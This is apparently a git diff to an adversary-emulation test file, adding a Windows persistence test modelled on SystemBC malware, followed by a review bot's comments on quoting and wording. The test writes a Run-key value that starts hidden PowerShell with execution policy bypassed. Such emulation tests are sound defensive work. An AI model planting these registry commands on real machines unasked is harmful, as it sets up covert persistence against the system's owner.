diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 3c41bed1..c2475081 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -151,3 +151,27 @@ atomic_tests:
     command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
     cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
     name: command_prompt
+
+- name: SystemBC Malware-as-a-Service Registry
+  description: |
+    This Atomic will create a registry key called socks5_powershell for persistance access
+    https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+  supported_platforms:
+  - windows
+  input_arguments:
+    reg_key_value:
+      description: Thing to Run
+      type: Path
+      default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+    reg_key_path:
+      description: Path to registry key to update
+      type: Path
+      default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+  executor:
+    command: |
+      $RunKey = "#{reg_key_path}"
+      Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+    cleanup_command: |
+      Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
+    name: powershell
+
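Review bot: The new test's `cleanup_command` passes `#{reg_key_path}` unquoted while `command` wraps the same argument in double quotes; the default path has no spaces, but a caller-supplied path that does would leave the value behind after the test, so quote it the same way: `Remove-ItemProperty -Path "#{reg_key_path}" -Name "socks5_powershell" -Force -ErrorAction Ignore`. `reg_key_value` is declared `type: Path` although its default is a command line rather than a filesystem path, so `type: string` describes it more accurately for anyone overriding it. The description has a typo ("persistance") and says the Atomic creates a registry key, whereas `Set-ItemProperty -Name` writes a value named `socks5_powershell` under the existing Run key; I would reword it to `This Atomic writes a value named socks5_powershell under the Run key for persistence`, which also tells defenders exactly which artifact to look for.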